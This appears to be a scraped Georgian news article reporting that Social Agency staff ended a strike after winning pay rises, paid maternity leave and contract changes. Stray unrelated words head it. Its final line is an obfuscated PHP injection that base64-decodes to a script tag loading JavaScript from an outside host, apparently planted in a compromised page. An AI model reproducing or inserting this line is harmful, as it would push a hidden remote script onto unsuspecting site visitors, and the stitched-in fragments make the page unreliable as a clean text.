celsiusi
ავერსი საქკაბელი

სოციალური სააგენტოს თანამშრომლებმა გაფიცვა შეწყვიტეს. როგორც მათი იურისტი აცხადებს, დამსაქმებელთან მთელ რიგ საკითხებზე მიღწეულია შეთანხმება, რაც არის მხოლოდ პირველი წინგადადგმული ნაბიჯი.

" გაფიცვა შეწყდა იმ პირობით, რომ ხელფასები, რომელიც 15 წელზე მეტია არ გაზრდილა, გაიზრდება 40%-60%-ით. მივიღეთ ანაზღაურებადი დეკრეტული შვებულება, რაც ნიშნავს, რომ ყოველი ბავშვის გაჩენის შემდეგ ყოველ თვე მშობელი მიიღებს იგივე ხელფასს, როგორც მუშაობისას. ასევე გაფიცულებს აუნაზღაურდებათ გაფიცული სამუშაო დრო; სოცაგენტები და უფროსი სოცაგენტები იქნებიან უზრუნველყოფილი ტრანსპორტით; გაუქმდება ერთთვიანი ხელშეკრულებები და ყველა დასაქმებულთან დაიდება ერთწლიანი ხელშეკრულებები; შეიქმნება სპეციალური საკომუნიკაციო პლატფორმა დასაქმებულსა და დამსაქმებელს შორის; უმჯობესდება დანამატის წესი და მოიხსნება 15 დღიანი ლიმიტი"-აცხადებს ომსარაშვილი.
 
მოლაპარაკებების შედეგად მიღწეული შეთანხმებით, სოციალური სააგენტოს თანამშრომლები სამუშაო ადგილებს ორშაბათიდან დაუბრუნდებიან.
 
წყარო: BMG
1035
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");